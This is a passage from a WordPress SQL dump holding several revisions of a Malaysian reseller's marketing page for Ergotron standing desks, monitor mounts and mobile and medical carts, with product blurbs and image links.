delivering peace of mind to resellers and customers.\r\n\r\n<h4>5. Patents</h4>\r\nErgotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.\r\n\r\n<div class=\"DnnModule DnnModule-2sxc DnnModule-2294\">\r\n<div class=\"container-top-margin\">\r\n<div id=\"dnn_ctr2294_ContentPane\">\r\n<div id=\"dnn_ctr2294_ModuleContent\" class=\"DNNModuleContent Mod2sxcC\">\r\n<div class=\"sc-viewport sc-content-block\" data-cb-instance=\"2294\" data-cb-id=\"2294\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-xs-12\">\r\n\r\n<h1>Standing Desks</h1>\r\nSit less. Stand more. Feel the difference.\r\n<p class=\"h3 ng-binding ng-scope\">1. WorkFit-Z MiniÂ <img class=\"alignnone wp-image-2486\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\" width=\"166\" height=\"167\" /></p>\r\n\r\n<div class=\"main\">\r\n<div class=\"ng-binding\">\r\n\r\nMake your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n\r\n2.Â WorkFit-TL, Standing Desk WorkstationÂ <img class=\"alignnone wp-image-2487\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-TL-Standing-Desk-Workstation.jpg\" alt=\"\" width=\"180\" height=\"180\" />\r\n\r\nPresenting an ultra easy standing desk solution, which quickly converts a tabletop into a healthy sit-stand workstation.Â WorkFit-TL features a larger keyboard tray and wider worksurface. Like the smaller WorkFit-T, it saves space because it moves straight up and down, always staying within the footprint of your desktop. Extremely stable throughout its range of motion, one can freely lean on it without worry of tip or height-drop.\r\n\r\n3.Â WorkFit-S,Â Dual Workstation with WorksurfaceÂ Â <img class=\"alignnone wp-image-2488\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-S-Dual-Workstation-with-Worksurface-.jpg\" alt=\"\" width=\"175\" height=\"175\" />\r\n\r\nThis easy-to-use sit-stand desk converter allows you to instantly raise or lower your keyboard and two displays in one simple motion, keeping your system stable as you work. Includes a complementary worksurface and larger keyboard tray.\r\n<h1>Mounts</h1>\r\nImprove your workflow: Mount a monitor, multiple displays, laptop or keyboard.\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">LX Desk Monitor ArmÂ <img class=\"alignnone wp-image-2489\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Desk-Monitor-Arm-.jpg\" alt=\"\" width=\"148\" height=\"148\" /></li>\r\n</ol>\r\nSleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n\r\n2.Â LX Dual Stacking ArmÂ  Â <img class=\"alignnone wp-image-2490\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Dual-Stacking-Arm-.jpg\" alt=\"\" width=\"174\" height=\"174\" />\r\n\r\nCreate a productive multi-display configuration that lifts screens up to where theyâ€™re easier to see while reclaiming valuable worksurface.\r\n\r\n3.Â LX Wall Monitor ArmÂ  Â <img class=\"alignnone wp-image-2491\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Wall-Monitor-Arm.jpg\" alt=\"\" width=\"217\" height=\"117\" />\r\n\r\nSleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n<h3 class=\"tab accordian ng-binding active\" style=\"text-align: left;\" tabindex=\"0\" role=\"tab\" aria-controls=\"panel1\">Product Benefits</h3>\r\n<ul>\r\n 	<li>Increase viewing comfortâ€”help reduce eye, back and neck strain</li>\r\n 	<li>Upgrade LCD monitors and TVs with improved ergonomic adjustment</li>\r\n 	<li>Patented CFâ„¢ motion technology provides premium ease-of-use display adjustment</li>\r\n 	<li>Cable management feature routes cables under the arm, out of the way</li>\r\n 	<li>Extends LCD up to 25\" (64 cm); push your display out of the way when not in use</li>\r\n</ul>\r\n<h1>Mobile Carts</h1>\r\nPersonalize an AV, computer or laptop cart to suit your workflow requirements.\r\n<h4>Mobile Workstations</h4>\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">WorkFit-C, Single LD Sit-Stand WorkstationÂ <img class=\"alignnone wp-image-2492\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Single-LD-Sit-Stand-Workstation.jpg\" alt=\"\" width=\"145\" height=\"145\" /></li>\r\n</ol>\r\nThis computer cartâ€™s large worksurface and height-adjustable keyboard tray and display make it a full-featured mobile desk, enabling computing comfort while you work. Stay energized and productive while you workâ€”move from a sitting to a standing position whenever you want.\r\n\r\n2.Â WorkFit-C, Dual Sit-Stand WorkstationÂ <img class=\"alignnone wp-image-2493\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Dual-Sit-Stand-Workstation.jpg\" alt=\"\" width=\"148\" height=\"148\" />\r\n\r\nThis innovative computer cart doubles as an adjustable sit-stand mobile desk. Stay energized and productive while you computeâ€”move from a sitting to a standing position whenever you want. The large worksurface, back-tilt keyboard tray and independently adjustable dual-monitor riser make computing comfortable.\r\n\r\n3.Â Neo-FlexÂ® Laptop CartÂ <img class=\"alignnone wp-image-2494\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Neo-FlexÂ®-Laptop-Cart.jpg\" alt=\"\" width=\"151\" height=\"150\" />\r\n\r\nThis secure, low-cost, height-adjustable computer cart supports your mobile computing needs today and tomorrow. It features a laptop security system, 20 inches (51 cm) of height adjustment (work sitting or standing), large worksurface, small footprint and a rugged, open-architecture design.\r\n<h4>Medical Carts</h4>\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">StyleViewÂ® Laptop Cart, SV40Â <img class=\"alignnone wp-image-2495\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Laptop-Cart-SV40.jpg\" alt=\"\" width=\"159\" height=\"159\" /></li>\r\n</ol>\r\nIncredibly lightweight. This innovative, truly ergonomic and easy-to-maneuver healthcare cart features sit-to-stand height adjustment and an adjustable back-tilt keyboard tray.\r\n\r\n2.Â StyleViewÂ® Telemedicine Cart, Single Monitor, PoweredÂ <img class=\"alignnone wp-image-2496\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Single-Monitor-Powered.jpg\" alt=\"\" width=\"160\" height=\"159\" />\r\n\r\nExpand healthcare access through telehealth with this easy and affordable mobile solution, which combines the power to support onboard diagnostics and videoconferencing with the benefits of a StyleView medical cart. Backed by our years of expertise and service, you can confidently build a telemedicine platform that matches your needs and budget.\r\n\r\n3.Â StyleViewÂ® Telemedicine Cart, PoweredÂ <img class=\"alignnone wp-image-2497\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Powered-.jpg\" alt=\"\" width=\"148\" height=\"149\" />\r\n\r\nThe modular design of StyleView carts allows you to build a telehealth solution that matches your requirements. Combine support for onboard diagnostics and videoconferencing with the benefits of a fully mobile workstation on wheels. The addition of the SV Dual Monitor Kit provides convenient side-to-side pivoting of either display, helping compartmentalize screen viewing for caregiver and patient.\r\n\r\n4.Â CareFitâ„¢ Slim LCD Cart, 1 Drawer (1x1)Â <img class=\"alignnone wp-image-2498\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/CareFitâ„¢-Slim-LCD-Cart-1-Drawer-1x1-.jpg\" alt=\"\" width=\"157\" height=\"158\" />\r\n\r\nThe ultra-lean CareFit computer cart works to remove barriers to the best patient care with a lightweight design that fits your people, workflows and environments. The broadest range of caregivers can work comfortably with the expansive height range that adjusts to the ergonomic needs of each user. The compact frame makes it easy to move all-in-one computers and monitors wherever work takes caregivers around the healthcare facility.\r\n\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2019-09-26 15:29:29','2019-09-26 07:29:29','',1483,'https://bintara.com.my/blog/2019/09/26/1483-revision-v1/',0,'revision','',0),(3518,1,'2019-09-26 15:18:21','2019-09-26 07:18:21','<h2><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n\r\n&nbsp;\r\n<h3 class=\"mgnbtm2\">Why Choose Ergotron?</h3>\r\n\r\n1. <strong>Ergonomics</strong>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n\r\n2. <strong>Environment</strong>\r\n\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n\r\n3. <strong>Research</strong>\r\n\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n\r\n4. <strong>Quality Tested</strong>\r\n\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n\r\n5. <strong>Patents</strong>\r\n<div class=\"DnnModule DnnModule-2sxc DnnModule-2294\">\r\n<div class=\"container-top-margin\">\r\n<div id=\"dnn_ctr2294_ContentPane\">\r\n<div id=\"dnn_ctr2294_ModuleContent\" class=\"DNNModuleContent Mod2sxcC\">\r\n<div class=\"sc-viewport sc-content-block\" data-cb-instance=\"2294\" data-cb-id=\"2294\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-xs-12\">\r\n<p class=\"intro\">Ergotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.</p>\r\n\r\n<h1>Standing Desks</h1>\r\nSit less. Stand more. Feel the difference.\r\n<p class=\"h3 ng-binding ng-scope\">1. WorkFit-Z MiniÂ <img class=\"alignnone wp-image-2486\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\" width=\"166\" height=\"167\" /></p>\r\n\r\n<div class=\"main\">\r\n<div class=\"ng-binding\">\r\n\r\nMake your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n\r\n2.Â WorkFit-TL, Standing Desk WorkstationÂ <img class=\"alignnone wp-image-2487\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-TL-Standing-Desk-Workstation.jpg\" alt=\"\" width=\"180\" height=\"180\" />\r\n\r\nPresenting an ultra easy standing desk solution, which quickly converts a tabletop into a healthy sit-stand workstation.Â WorkFit-TL features a larger keyboard tray and wider worksurface. Like the smaller WorkFit-T, it saves space because it moves straight up and down, always staying within the footprint of your desktop. Extremely stable throughout its range of motion, one can freely lean on it without worry of tip or height-drop.\r\n\r\n3.Â WorkFit-S,Â Dual Workstation with WorksurfaceÂ Â <img class=\"alignnone wp-image-2488\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-S-Dual-Workstation-with-Worksurface-.jpg\" alt=\"\" width=\"175\" height=\"175\" />\r\n\r\nThis easy-to-use sit-stand desk converter allows you to instantly raise or lower your keyboard and two displays in one simple motion, keeping your system stable as you work. Includes a complementary worksurface and larger keyboard tray.\r\n<h1>Mounts</h1>\r\nImprove your workflow: Mount a monitor, multiple displays, laptop or keyboard.\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">LX Desk Monitor ArmÂ <img class=\"alignnone wp-image-2489\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Desk-Monitor-Arm-.jpg\" alt=\"\" width=\"148\" height=\"148\" /></li>\r\n</ol>\r\nSleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n\r\n2.Â LX Dual Stacking ArmÂ  Â <img class=\"alignnone wp-image-2490\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Dual-Stacking-Arm-.jpg\" alt=\"\" width=\"174\" height=\"174\" />\r\n\r\nCreate a productive multi-display configuration that lifts screens up to where theyâ€™re easier to see while reclaiming valuable worksurface.\r\n\r\n3.Â LX Wall Monitor ArmÂ  Â <img class=\"alignnone wp-image-2491\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Wall-Monitor-Arm.jpg\" alt=\"\" width=\"217\" height=\"117\" />\r\n\r\nSleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n<h3 class=\"tab accordian ng-binding active\" style=\"text-align: left;\" tabindex=\"0\" role=\"tab\" aria-controls=\"panel1\">Product Benefits</h3>\r\n<ul>\r\n 	<li>Increase viewing comfortâ€”help reduce eye, back and neck strain</li>\r\n 	<li>Upgrade LCD monitors and TVs with improved ergonomic adjustment</li>\r\n 	<li>Patented CFâ„¢ motion technology provides premium ease-of-use display adjustment</li>\r\n 	<li>Cable management feature routes cables under the arm, out of the way</li>\r\n 	<li>Extends LCD up to 25\" (64 cm); push your display out of the way when not in use</li>\r\n</ul>\r\n<h1>Mobile Carts</h1>\r\nPersonalize an AV, computer or laptop cart to suit your workflow requirements.\r\n<h4>Mobile Workstations</h4>\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">WorkFit-C, Single LD Sit-Stand WorkstationÂ <img class=\"alignnone wp-image-2492\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Single-LD-Sit-Stand-Workstation.jpg\" alt=\"\" width=\"145\" height=\"145\" /></li>\r\n</ol>\r\nThis computer cartâ€™s large worksurface and height-adjustable keyboard tray and display make it a full-featured mobile desk, enabling computing comfort while you work. Stay energized and productive while you workâ€”move from a sitting to a standing position whenever you want.\r\n\r\n2.Â WorkFit-C, Dual Sit-Stand WorkstationÂ <img class=\"alignnone wp-image-2493\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Dual-Sit-Stand-Workstation.jpg\" alt=\"\" width=\"148\" height=\"148\" />\r\n\r\nThis innovative computer cart doubles as an adjustable sit-stand mobile desk. Stay energized and productive while you computeâ€”move from a sitting to a standing position whenever you want. The large worksurface, back-tilt keyboard tray and independently adjustable dual-monitor riser make computing comfortable.\r\n\r\n3.Â Neo-FlexÂ® Laptop CartÂ <img class=\"alignnone wp-image-2494\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Neo-FlexÂ®-Laptop-Cart.jpg\" alt=\"\" width=\"151\" height=\"150\" />\r\n\r\nThis secure, low-cost, height-adjustable computer cart supports your mobile computing needs today and tomorrow. It features a laptop security system, 20 inches (51 cm) of height adjustment (work sitting or standing), large worksurface, small footprint and a rugged, open-architecture design.\r\n<h4>Medical Carts</h4>\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">StyleViewÂ® Laptop Cart, SV40Â <img class=\"alignnone wp-image-2495\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Laptop-Cart-SV40.jpg\" alt=\"\" width=\"159\" height=\"159\" /></li>\r\n</ol>\r\nIncredibly lightweight. This innovative, truly ergonomic and easy-to-maneuver healthcare cart features sit-to-stand height adjustment and an adjustable back-tilt keyboard tray.\r\n\r\n2.Â StyleViewÂ® Telemedicine Cart, Single Monitor, PoweredÂ <img class=\"alignnone wp-image-2496\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Single-Monitor-Powered.jpg\" alt=\"\" width=\"160\" height=\"159\" />\r\n\r\nExpand healthcare access through telehealth with this easy and affordable mobile solution, which combines the power to support onboard diagnostics and videoconferencing with the benefits of a StyleView medical cart. Backed by our years of expertise and service, you can confidently build a telemedicine platform that matches your needs and budget.\r\n\r\n3.Â StyleViewÂ® Telemedicine Cart, PoweredÂ <img class=\"alignnone wp-image-2497\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Powered-.jpg\" alt=\"\" width=\"148\" height=\"149\" />\r\n\r\nThe modular design of StyleView carts allows you to build a telehealth solution that matches your requirements. Combine support for onboard diagnostics and videoconferencing with the benefits of a fully mobile workstation on wheels. The addition of the SV Dual Monitor Kit provides convenient side-to-side pivoting of either display, helping compartmentalize screen viewing for caregiver and patient.\r\n\r\n4.Â CareFitâ„¢ Slim LCD Cart, 1 Drawer (1x1)Â <img class=\"alignnone wp-image-2498\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/CareFitâ„¢-Slim-LCD-Cart-1-Drawer-1x1-.jpg\" alt=\"\" width=\"157\" height=\"158\" />\r\n\r\nThe ultra-lean CareFit computer cart works to remove barriers to the best patient care with a lightweight design that fits your people, workflows and environments. The broadest range of caregivers can work comfortably with the expansive height range that adjusts to the ergonomic needs of each user. The compact frame makes it easy to move all-in-one computers and monitors wherever work takes caregivers around the healthcare facility.\r\n\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2019-09-26 15:18:21','2019-09-26 07:18:21','',1483,'https://bintara.com.my/blog/2019/09/26/1483-revision-v1/',0,'revision','',0),(2501,1,'2018-12-18 23:16:09','2018-12-18 15:16:09','<h2 class=\"h4\"><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n\r\n<h3 class=\"text-center mgnbtm2\">Why Choose Ergotron?</h3>\r\n<ol>\r\n 	<li><strong>Ergonomics</strong></li>\r\n</ol>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n\r\n2. <strong>Environment</strong>\r\n\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n\r\n3. <strong>Research</strong>\r\n\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n\r\n4. <strong>Quality Tested</strong>\r\n\r\nOur products undergo a testing regimen that exceeds the industryâ€™s most rigid quality expectations. Ergotron strives to provide the highest levels of trouble-free performance and unsurpassed product longevity, delivering peace of mind to resellers and customers.\r\n\r\n5. <strong>Patents</strong>\r\n<div class=\"DnnModule DnnModule-2sxc DnnModule-2294\">\r\n<div class=\"container-top-margin\">\r\n<div id=\"dnn_ctr2294_ContentPane\">\r\n<div id=\"dnn_ctr2294_ModuleContent\" class=\"DNNModuleContent Mod2sxcC\">\r\n<div class=\"sc-viewport sc-content-block\" data-cb-instance=\"2294\" data-cb-id=\"2294\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-xs-12\">\r\n<p class=\"intro\">Ergotronâ€™s passion for innovation is evidenced in our large and growing number of patents applied to our dynamic portfolio of beautifully designed mounting, mobility and sit-to-stand solutions. Years of intense engineering development and drive to create more productive environment through human-centered design have resulted in many unique technological achievements, including our PowerShuttleÂ® and Constant Forceâ„¢ technologies.</p>\r\n\r\n<h1>Standing Desks</h1>\r\nSit less. Stand more. Feel the difference.\r\n<p class=\"h3 ng-binding ng-scope\">1. WorkFit-Z MiniÂ <img class=\"alignnone wp-image-2486\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-Z-Mini.jpg\" alt=\"\" width=\"166\" height=\"167\" /></p>\r\n\r\n<div class=\"main\">\r\n<div class=\"ng-binding\">\r\n\r\nMake your workspace work for you with the all-new WorkFit Z Mini. Big in benefits, this compact converter turns your current tabletop into a height-adjustable standing desk. Itâ€™s designed for the way you work bestâ€”sitting or standingâ€”with a grey woodgrain finish that freshens your home office. Upgrade to a sit-stand desk that fits you and the technology you loveâ€”single monitors, tablets or laptops.\r\n\r\n2.Â WorkFit-TL, Standing Desk WorkstationÂ <img class=\"alignnone wp-image-2487\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-TL-Standing-Desk-Workstation.jpg\" alt=\"\" width=\"180\" height=\"180\" />\r\n\r\nPresenting an ultra easy standing desk solution, which quickly converts a tabletop into a healthy sit-stand workstation.Â WorkFit-TL features a larger keyboard tray and wider worksurface. Like the smaller WorkFit-T, it saves space because it moves straight up and down, always staying within the footprint of your desktop. Extremely stable throughout its range of motion, one can freely lean on it without worry of tip or height-drop.\r\n\r\n3.Â WorkFit-S,Â Dual Workstation with WorksurfaceÂ Â <img class=\"alignnone wp-image-2488\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-S-Dual-Workstation-with-Worksurface-.jpg\" alt=\"\" width=\"175\" height=\"175\" />\r\n\r\nThis easy-to-use sit-stand desk converter allows you to instantly raise or lower your keyboard and two displays in one simple motion, keeping your system stable as you work. Includes a complementary worksurface and larger keyboard tray.\r\n<h1>Mounts</h1>\r\nImprove your workflow: Mount a monitor, multiple displays, laptop or keyboard.\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">LX Desk Monitor ArmÂ <img class=\"alignnone wp-image-2489\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Desk-Monitor-Arm-.jpg\" alt=\"\" width=\"148\" height=\"148\" /></li>\r\n</ol>\r\nSleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n\r\n2.Â LX Dual Stacking ArmÂ  Â <img class=\"alignnone wp-image-2490\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Dual-Stacking-Arm-.jpg\" alt=\"\" width=\"174\" height=\"174\" />\r\n\r\nCreate a productive multi-display configuration that lifts screens up to where theyâ€™re easier to see while reclaiming valuable worksurface.\r\n\r\n3.Â LX Wall Monitor ArmÂ  Â <img class=\"alignnone wp-image-2491\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/LX-Wall-Monitor-Arm.jpg\" alt=\"\" width=\"217\" height=\"117\" />\r\n\r\nSleek and streamlined, the LX frees up space and allows positioning of your display for greater productivity. Reposition your LCD with just a touch. Up. Down. Forward. Back. The LX provides unparalleled range of motion.\r\n<h3 class=\"tab accordian ng-binding active\" style=\"text-align: left;\" tabindex=\"0\" role=\"tab\" aria-controls=\"panel1\">Product Benefits</h3>\r\n<ul>\r\n 	<li>Increase viewing comfortâ€”help reduce eye, back and neck strain</li>\r\n 	<li>Upgrade LCD monitors and TVs with improved ergonomic adjustment</li>\r\n 	<li>Patented CFâ„¢ motion technology provides premium ease-of-use display adjustment</li>\r\n 	<li>Cable management feature routes cables under the arm, out of the way</li>\r\n 	<li>Extends LCD up to 25\" (64 cm); push your display out of the way when not in use</li>\r\n</ul>\r\n<h1>Mobile Carts</h1>\r\nPersonalize an AV, computer or laptop cart to suit your workflow requirements.\r\n<h4>Mobile Workstations</h4>\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">WorkFit-C, Single LD Sit-Stand WorkstationÂ <img class=\"alignnone wp-image-2492\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Single-LD-Sit-Stand-Workstation.jpg\" alt=\"\" width=\"145\" height=\"145\" /></li>\r\n</ol>\r\nThis computer cartâ€™s large worksurface and height-adjustable keyboard tray and display make it a full-featured mobile desk, enabling computing comfort while you work. Stay energized and productive while you workâ€”move from a sitting to a standing position whenever you want.\r\n\r\n2.Â WorkFit-C, Dual Sit-Stand WorkstationÂ <img class=\"alignnone wp-image-2493\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/WorkFit-C-Dual-Sit-Stand-Workstation.jpg\" alt=\"\" width=\"148\" height=\"148\" />\r\n\r\nThis innovative computer cart doubles as an adjustable sit-stand mobile desk. Stay energized and productive while you computeâ€”move from a sitting to a standing position whenever you want. The large worksurface, back-tilt keyboard tray and independently adjustable dual-monitor riser make computing comfortable.\r\n\r\n3.Â Neo-FlexÂ® Laptop CartÂ <img class=\"alignnone wp-image-2494\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Neo-FlexÂ®-Laptop-Cart.jpg\" alt=\"\" width=\"151\" height=\"150\" />\r\n\r\nThis secure, low-cost, height-adjustable computer cart supports your mobile computing needs today and tomorrow. It features a laptop security system, 20 inches (51 cm) of height adjustment (work sitting or standing), large worksurface, small footprint and a rugged, open-architecture design.\r\n<h4>Medical Carts</h4>\r\n<ol>\r\n 	<li class=\"h3 ng-binding ng-scope\">StyleViewÂ® Laptop Cart, SV40Â <img class=\"alignnone wp-image-2495\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Laptop-Cart-SV40.jpg\" alt=\"\" width=\"159\" height=\"159\" /></li>\r\n</ol>\r\nIncredibly lightweight. This innovative, truly ergonomic and easy-to-maneuver healthcare cart features sit-to-stand height adjustment and an adjustable back-tilt keyboard tray.\r\n\r\n2.Â StyleViewÂ® Telemedicine Cart, Single Monitor, PoweredÂ <img class=\"alignnone wp-image-2496\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Single-Monitor-Powered.jpg\" alt=\"\" width=\"160\" height=\"159\" />\r\n\r\nExpand healthcare access through telehealth with this easy and affordable mobile solution, which combines the power to support onboard diagnostics and videoconferencing with the benefits of a StyleView medical cart. Backed by our years of expertise and service, you can confidently build a telemedicine platform that matches your needs and budget.\r\n\r\n3.Â StyleViewÂ® Telemedicine Cart, PoweredÂ <img class=\"alignnone wp-image-2497\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/StyleViewÂ®-Telemedicine-Cart-Powered-.jpg\" alt=\"\" width=\"148\" height=\"149\" />\r\n\r\nThe modular design of StyleView carts allows you to build a telehealth solution that matches your requirements. Combine support for onboard diagnostics and videoconferencing with the benefits of a fully mobile workstation on wheels. The addition of the SV Dual Monitor Kit provides convenient side-to-side pivoting of either display, helping compartmentalize screen viewing for caregiver and patient.\r\n\r\n4.Â CareFitâ„¢ Slim LCD Cart, 1 Drawer (1x1)Â <img class=\"alignnone wp-image-2498\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/CareFitâ„¢-Slim-LCD-Cart-1-Drawer-1x1-.jpg\" alt=\"\" width=\"157\" height=\"158\" />\r\n\r\nThe ultra-lean CareFit computer cart works to remove barriers to the best patient care with a lightweight design that fits your people, workflows and environments. The broadest range of caregivers can work comfortably with the expansive height range that adjusts to the ergonomic needs of each user. The compact frame makes it easy to move all-in-one computers and monitors wherever work takes caregivers around the healthcare facility.\r\n\r\nTo discover more, please click the button below or contact us to discuss your needs.\r\n\r\n[maxbutton id=\"1\" ]\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Ergotron','','inherit','closed','closed','','1483-revision-v1','','','2018-12-18 23:16:09','2018-12-18 15:16:09','',1483,'https://bintara.com.my/blog/2018/12/18/1483-revision-v1/',0,'revision','',0),(2215,1,'2018-12-15 20:25:00','2018-12-15 12:25:00','<h2 class=\"h4\"><strong>Productivity. Wellness. Balance. Feel the difference.</strong></h2>\r\n<p class=\"intro\">For more than three decades, Ergotron has offered affordable ergonomic products to computer users bringing comfort, wellness and improved productivity into the workplace.Â Ergotron offers wall, ceiling and desk mounts, desk stands, office and tech furniture, sit-stand workstations, device charging stations, carts and vertical lifts.</p>\r\n\r\n<h3 class=\"text-center mgnbtm2\">Why Choose Ergotron?</h3>\r\n<ol>\r\n 	<li><strong>Ergonomics</strong><img src=\"https://www.ergotron.com/Portals/0/Images/Icons/icon-ergonomics.png\" /></li>\r\n</ol>\r\nThe right mount will give you the maximum amount of flexibility to get into the right ergonomic zone.\r\n\r\n2. <strong>Environment</strong><img src=\"https://www.ergotron.com/Portals/0/Images/Icons/icon-environment.png\" />\r\n\r\nOur dedication to quality allows our company to reduce its environmental footprint, even while we grow, by using characteristic innovation and state of the art management practices to find efficiencies wherever possible.\r\n\r\n3. <strong>Research</strong>Â  Â  Â <img src=\"https://www.ergotron.com/Portals/0/Images/Icons/icon-research2.png\" />\r\n\r\nAt Ergotron, evidence-based data is the wellspring for product development. With the growing intensity in the relationship between digital technology and people, Ergotron is focused on what this means to individual health and how our products can help.\r\n\r\n4. <strong>Quality Tested</strong>Â Â <img 